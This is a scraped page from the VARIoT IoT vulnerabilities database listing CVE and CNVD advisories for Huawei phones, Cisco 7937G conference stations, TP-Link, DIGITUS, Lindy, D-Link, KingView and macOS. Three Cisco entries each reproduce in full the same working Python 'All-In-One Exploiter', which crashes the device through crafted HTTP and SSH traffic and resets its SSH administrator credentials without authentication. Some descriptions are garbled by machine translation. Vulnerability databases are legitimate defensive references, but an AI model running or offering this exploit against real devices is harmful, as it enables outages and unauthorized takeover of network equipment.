VARIoT IoT vulnerabilities database

Affected products: vendor, model and version
CWE format is 'CWE-number'. Threat type can be: remote or local
Look up free text in title and description

VAR-202008-1049 CVE-2020-9245 HUAWEI P30 and P30 Pro Unauthorized authentication vulnerability in CVSS V2: 4.3
CVSS V3: 5.5
Severity: MEDIUM
HUAWEI P30 versions Versions earlier than 10.1.0.160(C00E160R2P11);HUAWEI P30 Pro versions Versions earlier than 10.1.0.160(C00E160R2P8) have a denial of service vulnerability. Certain system configuration can be modified because of improper authorization. The attacker could trick the user installing and executing a malicious application, successful exploit could cause a denial of service condition of PHONE function. HUAWEI P30 and P30 Pro Exists in a fraudulent authentication vulnerability.Service operation interruption (DoS) It may be put into a state. Both Huawei P30 and Huawei P30 Pro are smartphones of China's Huawei (Huawei) company. The vulnerability is caused by incorrect authorization
VAR-202008-0711 CVE-2020-16138 Cisco 7937G input validation error vulnerability

Related entries in the VARIoT exploits database: VAR-E-202008-0037
CVSS V2: 7.8
CVSS V3: 7.5
Severity: HIGH
A denial-of-service issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to remotely disable the device until it is power cycled. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE’s reference information. ** Not supported ** This issue is a vulnerability in an unsupported version. Cisco 7937G is an online conference terminal equipment of Cisco (Cisco). There are security vulnerabilities in Cisco 7937G version 1-4-4-0 to version 1-4-5-7. An attacker can use this vulnerability to cause a denial of service. # Exploit Title: Cisco 7937G All-In-One Exploiter # Date: 2020-08-10 # Exploit Author: Cody Martin # Vendor Homepage: https://cisco.com # Version: <=SIP-1-4-5-7 # Tested On: SIP-1-4-5-5, SIP-1-4-5-7 # CVE: CVE-2020-16139, CVE-2020-16138, CVE-2020-16137 #!/usr/bin/python import sys import getopt import requests import paramiko import socket import os def main(argv): target = "" attack = "" username = "" password = "" divider = "=============================================" help_text = ''' exploit.py -t/--target ip-address-of-target -a/--attack attack-type [-u/--user username -p/--password password] %s Example: exploit.py -t 192.168.1.200 -a 1 Example: exploit.py --target 192.168.1.200 --attack 3 --user bob --password villa %s Attack types: 1: DoS with automatic device reset 2: DoS without automatic device reset 3: Change SSH credentials of target device ''' % (divider, divider) if len(sys.argv) == 1: print(help_text) sys.exit(2) try: opts, args = getopt.getopt(argv, "ht:a:u:p:", ["help", "target=", "attack=", "user=", "password="]) except getopt.GetoptError: print(help_text) sys.exit(2) for opt, arg in opts: if opt == "-h": print(help_text) sys.exit() elif opt in ("-t", "--target"): target = arg elif opt in ("-a", "--attack"): attack = arg elif opt in ("-u", "--user"): username = arg elif opt in ("-p", "--password"): password = arg if username != "" and password != "" and attack == "3": print("Starting SSH attack!") print(divider) print("Target: ", target, "\nAttack: ", attack, "\nUser: ", username, "\nPassword: ", password) finished = attack_ssh(target, username, password) elif attack == "1": print("Starting DoS reset attack!") print(divider) print("Target: ", target, "\nAttack: ", attack) finished = dos_one(target) elif attack == "2": print("Starting DoS non-reset attack!") print(divider) print("Target: ", target, "\nAttack: ", attack) finished = dos_two(target) print(divider) if finished == 1: print("DoS reset attack completed!") elif finished == 2: print("DoS non-reset attack completed!") print("Device must be power cycled to restore functionality.") elif finished == 3: tell = "SSH attack finished!\nTry to login using the supplied credentials %s:%s" % (username, password) connection_example = "ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 %s@%s" % (username, target) print(tell) print("You must specify the key exchange when connecting or the device will be DoS'd!") print(connection_example) elif finished == 0: print("Something strange happened. Attack likely unsuccessful.") sys.exit() def dos_one(target): url = "http://%s/localmenus.cgi" % target data = "A"*46 payload = {"func": "609", "data": data, "rphl": "1"} print("FIRING ZE MIZZLES!") for i in range(1000): try: r = requests.post(url=url, params=payload, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() except requests.exceptions.RequestException: return 1 return 0 def dos_two(target): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(15) try: sock.connect((target, 22)) except OSError: print("Device doesn't appear to be functioning (already DoS'd?) or SSH is not enabled.") sys.exit() transport = paramiko.Transport(sock=sock, disabled_algorithms={"kex": ["diffie-hellman-group-exchange-sha1", "diffie-hellman-group14-sha1", "diffie-hellman-group1-sha1"]}) fd = os.open("/dev/null", os.O_WRONLY) savefd = os.dup(2) os.dup2(fd, 2) try: transport.connect(username="notreal", password="notreal") except (paramiko.ssh_exception.SSHException, OSError, paramiko.SSHException): os.dup2(savefd, 2) return 2 return 0 def attack_ssh(target, username, password): url = "http://%s/localmenus.cgi" % target payload_user = {"func": "403", "set": "401", "name1": username, "name2": username} payload_pass = {"func": "403", "set": "402", "pwd1": password, "pwd2": password} print("FIRING ZE MIZZLES!") try: r = requests.post(url=url, params=payload_user, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() r = requests.post(url=url, params=payload_pass, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() except requests.exceptions.RequestException: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() return 3 if __name__ == "__main__": main(sys.argv[1:])
VAR-202008-0721 CVE-2020-16137 Cisco Unified IP Conference Station 7937G Vulnerability related to authority management in

Related entries in the VARIoT exploits database: VAR-E-202008-0037
CVSS V2: 6.8
CVSS V3: 9.8
Severity: CRITICAL
A privilege escalation issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to reset the credentials for the SSH administrative console to arbitrary values. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE’s reference information. ** Not supported ** This issue is a vulnerability in an unsupported version. (DoS) It may be put into a state. Cisco 7947G is an online conference terminal equipment of Cisco. The Cisco 7947G product has security vulnerabilities. Attackers can use this vulnerability to elevate permissions. # Exploit Title: Cisco 7937G All-In-One Exploiter # Date: 2020-08-10 # Exploit Author: Cody Martin # Vendor Homepage: https://cisco.com # Version: <=SIP-1-4-5-7 # Tested On: SIP-1-4-5-5, SIP-1-4-5-7 # CVE: CVE-2020-16139, CVE-2020-16138, CVE-2020-16137 #!/usr/bin/python import sys import getopt import requests import paramiko import socket import os def main(argv): target = "" attack = "" username = "" password = "" divider = "=============================================" help_text = ''' exploit.py -t/--target ip-address-of-target -a/--attack attack-type [-u/--user username -p/--password password] %s Example: exploit.py -t 192.168.1.200 -a 1 Example: exploit.py --target 192.168.1.200 --attack 3 --user bob --password villa %s Attack types: 1: DoS with automatic device reset 2: DoS without automatic device reset 3: Change SSH credentials of target device ''' % (divider, divider) if len(sys.argv) == 1: print(help_text) sys.exit(2) try: opts, args = getopt.getopt(argv, "ht:a:u:p:", ["help", "target=", "attack=", "user=", "password="]) except getopt.GetoptError: print(help_text) sys.exit(2) for opt, arg in opts: if opt == "-h": print(help_text) sys.exit() elif opt in ("-t", "--target"): target = arg elif opt in ("-a", "--attack"): attack = arg elif opt in ("-u", "--user"): username = arg elif opt in ("-p", "--password"): password = arg if username != "" and password != "" and attack == "3": print("Starting SSH attack!") print(divider) print("Target: ", target, "\nAttack: ", attack, "\nUser: ", username, "\nPassword: ", password) finished = attack_ssh(target, username, password) elif attack == "1": print("Starting DoS reset attack!") print(divider) print("Target: ", target, "\nAttack: ", attack) finished = dos_one(target) elif attack == "2": print("Starting DoS non-reset attack!") print(divider) print("Target: ", target, "\nAttack: ", attack) finished = dos_two(target) print(divider) if finished == 1: print("DoS reset attack completed!") elif finished == 2: print("DoS non-reset attack completed!") print("Device must be power cycled to restore functionality.") elif finished == 3: tell = "SSH attack finished!\nTry to login using the supplied credentials %s:%s" % (username, password) connection_example = "ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 %s@%s" % (username, target) print(tell) print("You must specify the key exchange when connecting or the device will be DoS'd!") print(connection_example) elif finished == 0: print("Something strange happened. Attack likely unsuccessful.") sys.exit() def dos_one(target): url = "http://%s/localmenus.cgi" % target data = "A"*46 payload = {"func": "609", "data": data, "rphl": "1"} print("FIRING ZE MIZZLES!") for i in range(1000): try: r = requests.post(url=url, params=payload, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() except requests.exceptions.RequestException: return 1 return 0 def dos_two(target): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(15) try: sock.connect((target, 22)) except OSError: print("Device doesn't appear to be functioning (already DoS'd?) or SSH is not enabled.") sys.exit() transport = paramiko.Transport(sock=sock, disabled_algorithms={"kex": ["diffie-hellman-group-exchange-sha1", "diffie-hellman-group14-sha1", "diffie-hellman-group1-sha1"]}) fd = os.open("/dev/null", os.O_WRONLY) savefd = os.dup(2) os.dup2(fd, 2) try: transport.connect(username="notreal", password="notreal") except (paramiko.ssh_exception.SSHException, OSError, paramiko.SSHException): os.dup2(savefd, 2) return 2 return 0 def attack_ssh(target, username, password): url = "http://%s/localmenus.cgi" % target payload_user = {"func": "403", "set": "401", "name1": username, "name2": username} payload_pass = {"func": "403", "set": "402", "pwd1": password, "pwd2": password} print("FIRING ZE MIZZLES!") try: r = requests.post(url=url, params=payload_user, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() r = requests.post(url=url, params=payload_pass, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() except requests.exceptions.RequestException: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() return 3 if __name__ == "__main__": main(sys.argv[1:])
VAR-202008-1047 CVE-2020-9243 HUAWEI Mate 30 Recursive control vulnerability in CVSS V2: 4.3
CVSS V3: 5.5
Severity: MEDIUM
HUAWEI Mate 30 with versions earlier than 10.1.0.150(C00E136R5P3) have a denial of service vulnerability. The system does not properly limit the depth of recursion, an attacker should trick the user installing and execute a malicious application. Successful exploit could cause a denial of service condition. HUAWEI Mate 30 Exists in a recursive control vulnerability.Service operation interruption (DoS) It may be put into a state. Huawei Mate 30 is a smart phone launched by Huawei
VAR-202008-0712 CVE-2020-16139 Cisco Unified IP Conference Station 7937G Input verification vulnerability in

Related entries in the VARIoT exploits database: VAR-E-202008-0037
CVSS V2: 7.8
CVSS V3: 7.5
Severity: HIGH
A denial-of-service in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers restart the device remotely through sending specially crafted packets. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE’s reference information. ** Not supported ** This issue is a vulnerability in an unsupported version. Cisco 7937G is an online conference terminal equipment of Cisco (Cisco). There are security vulnerabilities in Cisco 7937G version 1-4-4-0 to version 1-4-5-7. An attacker can use this vulnerability to cause a denial of service. # Exploit Title: Cisco 7937G All-In-One Exploiter # Date: 2020-08-10 # Exploit Author: Cody Martin # Vendor Homepage: https://cisco.com # Version: <=SIP-1-4-5-7 # Tested On: SIP-1-4-5-5, SIP-1-4-5-7 # CVE: CVE-2020-16139, CVE-2020-16138, CVE-2020-16137 #!/usr/bin/python import sys import getopt import requests import paramiko import socket import os def main(argv): target = "" attack = "" username = "" password = "" divider = "=============================================" help_text = ''' exploit.py -t/--target ip-address-of-target -a/--attack attack-type [-u/--user username -p/--password password] %s Example: exploit.py -t 192.168.1.200 -a 1 Example: exploit.py --target 192.168.1.200 --attack 3 --user bob --password villa %s Attack types: 1: DoS with automatic device reset 2: DoS without automatic device reset 3: Change SSH credentials of target device ''' % (divider, divider) if len(sys.argv) == 1: print(help_text) sys.exit(2) try: opts, args = getopt.getopt(argv, "ht:a:u:p:", ["help", "target=", "attack=", "user=", "password="]) except getopt.GetoptError: print(help_text) sys.exit(2) for opt, arg in opts: if opt == "-h": print(help_text) sys.exit() elif opt in ("-t", "--target"): target = arg elif opt in ("-a", "--attack"): attack = arg elif opt in ("-u", "--user"): username = arg elif opt in ("-p", "--password"): password = arg if username != "" and password != "" and attack == "3": print("Starting SSH attack!") print(divider) print("Target: ", target, "\nAttack: ", attack, "\nUser: ", username, "\nPassword: ", password) finished = attack_ssh(target, username, password) elif attack == "1": print("Starting DoS reset attack!") print(divider) print("Target: ", target, "\nAttack: ", attack) finished = dos_one(target) elif attack == "2": print("Starting DoS non-reset attack!") print(divider) print("Target: ", target, "\nAttack: ", attack) finished = dos_two(target) print(divider) if finished == 1: print("DoS reset attack completed!") elif finished == 2: print("DoS non-reset attack completed!") print("Device must be power cycled to restore functionality.") elif finished == 3: tell = "SSH attack finished!\nTry to login using the supplied credentials %s:%s" % (username, password) connection_example = "ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 %s@%s" % (username, target) print(tell) print("You must specify the key exchange when connecting or the device will be DoS'd!") print(connection_example) elif finished == 0: print("Something strange happened. Attack likely unsuccessful.") sys.exit() def dos_one(target): url = "http://%s/localmenus.cgi" % target data = "A"*46 payload = {"func": "609", "data": data, "rphl": "1"} print("FIRING ZE MIZZLES!") for i in range(1000): try: r = requests.post(url=url, params=payload, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() except requests.exceptions.RequestException: return 1 return 0 def dos_two(target): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(15) try: sock.connect((target, 22)) except OSError: print("Device doesn't appear to be functioning (already DoS'd?) or SSH is not enabled.") sys.exit() transport = paramiko.Transport(sock=sock, disabled_algorithms={"kex": ["diffie-hellman-group-exchange-sha1", "diffie-hellman-group14-sha1", "diffie-hellman-group1-sha1"]}) fd = os.open("/dev/null", os.O_WRONLY) savefd = os.dup(2) os.dup2(fd, 2) try: transport.connect(username="notreal", password="notreal") except (paramiko.ssh_exception.SSHException, OSError, paramiko.SSHException): os.dup2(savefd, 2) return 2 return 0 def attack_ssh(target, username, password): url = "http://%s/localmenus.cgi" % target payload_user = {"func": "403", "set": "401", "name1": username, "name2": username} payload_pass = {"func": "403", "set": "402", "pwd1": password, "pwd2": password} print("FIRING ZE MIZZLES!") try: r = requests.post(url=url, params=payload_user, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() r = requests.post(url=url, params=payload_pass, timeout=5) if r.status_code != 200: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() except requests.exceptions.RequestException: print("Device doesn't appear to be functioning or web access is not enabled.") sys.exit() return 3 if __name__ == "__main__": main(sys.argv[1:])
VAR-202010-1506 CVE-2020-9939 macOS  Vulnerability in loading unsigned kernel extensions in CVSS V2: 4.4
CVSS V3: 6.4
Severity: MEDIUM
This issue was addressed with improved checks. This issue is fixed in macOS Catalina 10.15.6. A local user may be able to load unsigned kernel extensions. This vulnerability allows local attackers to escalate privileges on affected installations of Apple macOS. An attacker must first obtain the ability to execute high-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the handling of kernel extensions in kextload. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges and execute code in the context of the kernel. Apple macOS Catalina is a set of dedicated operating systems developed by Apple for Mac computers. Sandbox is one of the sandbox components. A security vulnerability exists in the Sandbox component of Apple macOS Catalina prior to 10.15.6. The vulnerability stems from the fact that the program does not properly lock objects before operating on them
VAR-202008-1323 No CVE KingView has a code execution vulnerability (CNVD-2020-45670) CVSS V2: 7.2
CVSS V3: -
Severity: HIGH
KingView (KingView) is an industrial automation configuration software produced by Beijing Yakong Technology Development Co., Ltd. KingView has a code execution vulnerability, which can be exploited by attackers to gain control of the website server.
VAR-202008-1288 No CVE KingView has a code execution vulnerability (CNVD-2020-45671) CVSS V2: 7.2
CVSS V3: -
Severity: HIGH
KingView (KingView) is an industrial automation configuration software produced by Beijing Yakong Technology Development Co., Ltd. KingView has a code execution vulnerability, which can be exploited by attackers to gain control of the website server.
VAR-202008-1266 No CVE Shanghai ZLAN Information Technology Co., Ltd. ZLAN serial server has logic flaws and vulnerabilities CVSS V2: 3.6
CVSS V3: -
Severity: LOW
ZLAN5102 serial server is a protocol converter between RS232/485 and TCP/IP developed by Shanghai ZLAN Information Technology Co., Ltd. The serial server can easily connect serial devices to Ethernet and the Internet, and realize the network upgrade of serial devices. ZLAN5103 is a new generation of high-performance serial server developed by Shanghai ZLAN based on ZLAN1003. The ZLAN serial server of Shanghai ZLAN Information Technology Co., Ltd. has a logic flaw vulnerability. Attackers can use this vulnerability to modify device information without authorization.
VAR-202008-1267 No CVE D-Link DCS-2530 has a command execution vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
DCS-2530L is a camera from DEXUN Electronic Equipment (Shanghai) Co., Ltd. D-Link DCS-2530 has a command execution vulnerability. Attackers can use the vulnerability to obtain a user name and password in plain text and execute arbitrary commands.
VAR-202008-0616 CVE-2020-15063 DIGITUS DA-70254 4-Port Gigabit Network Hub Authentication vulnerabilities in devices CVSS V2: 8.3
CVSS V3: 8.8
Severity: HIGH
DIGITUS DA-70254 4-Port Gigabit Network Hub 2.073.000.E0008 devices allow an attacker on the same network to bypass authentication via a web-administration request that lacks a password parameter. (DoS) It may be put into a state. Attackers can use this vulnerability to bypass authentication with the help of Web management requests
VAR-202008-0609 CVE-2020-15056 TP-Link USB Network Server TL-PS310U Cross-site scripting vulnerabilities in devices CVSS V2: 2.3
CVSS V3: 4.3
Severity: MEDIUM
TP-Link USB Network Server TL-PS310U devices before 2.079.000.t0210 allow an attacker on the same network to conduct persistent XSS attacks by leveraging administrative privileges to set a crafted server name. TP-Link USB Network Server TL-PS310U A cross-site scripting vulnerability exists in the device.Information may be obtained and tampered with. TP-Link TL-PS310U is a single USB2.0 port MFP and storage server. TP-Link TL-PS310U version before 2.079.000.t0210 has a cross-site scripting vulnerability
VAR-202008-1312 No CVE Beijing Yakong Technology Development Co., Ltd. KingView has a code execution vulnerability CVSS V2: 7.2
CVSS V3: -
Severity: HIGH
KingView (KingView) is an industrial automation configuration software produced by Beijing Yakong Technology Development Co., Ltd. Beijing Yakong Technology Development Co., Ltd. KingView has a code execution vulnerability. Attackers can use the vulnerability to gain control of the website server.
VAR-202008-1313 No CVE Advantech (China) Co., Ltd. WebAccess Node has a denial of service vulnerability (CNVD-2020-45127) CVSS V2: 4.9
CVSS V3: -
Severity: MEDIUM
WebAccess Node is an HMI/SCADA monitoring software completely based on IE browser from Advantech (China) Co., Ltd. Advantech (China) Co., Ltd. WebAccess Node has a denial of service vulnerability. Attackers can use the vulnerability to cause a denial of service.
VAR-202008-1314 No CVE Advantech (China) Co., Ltd. WebAccess Node has a denial of service vulnerability CVSS V2: 4.9
CVSS V3: -
Severity: MEDIUM
WebAccess Node is an HMI/SCADA monitoring software completely based on IE browser from Advantech (China) Co., Ltd. Advantech (China) Co., Ltd. WebAccess Node has a denial of service vulnerability. Attackers can use the vulnerability to cause a denial of service.
VAR-202008-0607 CVE-2020-15054 TP-Link USB Network Server TL-PS310U Inadequate protection of credentials on devices Vulnerabilities CVSS V2: 3.3
CVSS V3: 8.8
Severity: HIGH
TP-Link USB Network Server TL-PS310U devices before 2.079.000.t0210 allow an attacker on the same network to elevate privileges because the administrative password can be discovered by sniffing unencrypted UDP traffic. TP-Link USB Network Server TL-PS310U Devices contain vulnerabilities in inadequate protection of credentials.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. TP-Link TL-PS310U is a single USB2.0 port MFP and storage server. The TP-Link TL-PS310U version prior to 2.079.000.t0210 has a privilege escalation vulnerability. Attackers on the same network can use this vulnerability to increase privileges
VAR-202008-0608 CVE-2020-15055 TP-Link USB Network Server TL-PS310U Authentication vulnerabilities in devices CVSS V2: 8.3
CVSS V3: 8.8
Severity: HIGH
TP-Link USB Network Server TL-PS310U devices before 2.079.000.t0210 allow an attacker on the same network to bypass authentication via a web-administration request that lacks a password parameter. (DoS) It may be put into a state. TP-Link TL-PS310U is a single USB2.0 port MFP and storage server. TP-Link TL-PS310U version before 2.079.000.t0210 has an authentication bypass vulnerability
VAR-202008-0615 CVE-2020-15062 DIGITUS DA-70254 4-Port Gigabit Network Hub Inadequate protection of credentials on devices Vulnerabilities CVSS V2: 3.3
CVSS V3: 8.8
Severity: HIGH
DIGITUS DA-70254 4-Port Gigabit Network Hub 2.073.000.E0008 devices allow an attacker on the same network to elevate privileges because the administrative password can be discovered by sniffing unencrypted UDP traffic. (DoS) It may be put into a state. Assmann Electronic DIGITUS DA-70254 4-Port Gigabit Network Hub is a gigabit network hub made by Assmann Electronic in Germany. Attackers can use this vulnerability by sniffing unencrypted UDP traffic to obtain management passwords and increase their authority
VAR-202008-0610 CVE-2020-15057 TP-Link USB Network Server TL-PS310U Input verification vulnerabilities in devices CVSS V2: 6.1
CVSS V3: 6.5
Severity: MEDIUM
TP-Link USB Network Server TL-PS310U devices before 2.079.000.t0210 allow an attacker on the same network to denial-of-service the device via long input values. TP-Link TL-PS310U is a single USB2.0 port MFP and storage server. TP-Link TL-PS310U version before 2.079.000.t0210 has a denial of service vulnerability
VAR-202008-0612 CVE-2020-15059 Lindy 42633 4-Port USB 2.0 Gigabit Network Server Authentication vulnerabilities in devices CVSS V2: 8.3
CVSS V3: 8.8
Severity: HIGH
Lindy 42633 4-Port USB 2.0 Gigabit Network Server 2.078.000 devices allow an attacker on the same network to bypass authentication via a web-administration request that lacks a password parameter. (DoS) It may be put into a state. Lindy 42633 2.078.000 has an authentication bypass vulnerability